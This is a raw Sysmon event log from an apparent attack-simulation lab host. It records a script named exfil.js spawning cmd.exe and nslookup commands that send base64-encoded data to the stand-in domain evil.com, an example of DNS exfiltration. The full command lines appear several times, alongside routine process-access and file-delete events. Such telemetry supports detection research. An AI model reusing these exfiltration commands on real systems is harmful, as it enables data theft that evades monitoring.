14:21:25.771{2E1864BB-18E5-629A-C142-000000005F02}7456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmna.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000206734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.750{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.750{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.750{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlemu.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-18E5-629A-BF42-000000005F02}77807784C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C042-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C042-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.735{2E1864BB-18E5-629A-BE42-000000005F02}77965556C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-C042-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.736{2E1864BB-18E5-629A-C042-000000005F02}5592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-BE42-000000005F02}7796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlemu.tmp 2>&1 10341000x8000000000000000206723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.703{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-BF42-000000005F02}7780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.703{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-BF42-000000005F02}7780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.703{2E1864BB-18E5-629A-BF42-000000005F02}77807784C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-BE42-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BF42-000000005F02}7780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BE42-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-18E0-629A-6742-000000005F02}39766928C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-BE42-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.696{2E1864BB-18E5-629A-BE42-000000005F02}7796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlemu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwtch.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.688{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C054A9A58F74DF56ACA401E94137AA,SHA256=6412B269AC08011389C534C5550F8CAB0058513C7AC7F4E4A1C0E8F1B2BA31C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.672{2E1864BB-18E5-629A-BC42-000000005F02}13847284C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-BD42-000000005F02}6580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.671{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.671{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.671{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.670{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.670{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BD42-000000005F02}6580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 